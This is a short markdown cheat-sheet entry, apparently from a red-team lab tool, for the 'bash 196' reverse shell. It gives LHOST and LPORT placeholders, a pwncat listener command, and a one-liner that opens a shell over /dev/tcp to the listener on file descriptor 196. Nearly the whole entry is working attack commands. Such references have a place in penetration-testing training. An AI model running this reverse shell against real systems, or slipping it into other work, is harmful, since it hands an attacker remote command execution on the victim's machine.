# bash 196

[TOC]

## Vars

| Variable | Value     | Description |
| -------- | --------- | ----------- |
| LHOST    | {{LHOST}} | The IP the target will connect to |
| LPORT    | {{LPORT}} | The port the target will connect to |

## Description

`bash 196` uses `/dev/tcp` and the aribitrary file descriptor `196`.

## Commands

### Red: Create Listener

```bash
autovnet rtfm pwncat -n {{LHOST}} {{LPORT}}
```

### Blue: Throw Reverse Shell

```bash
0<&196;exec 196<>/dev/tcp/{{LHOST}}/{{LPORT}}; sh <&196 >&196 2>&196
```
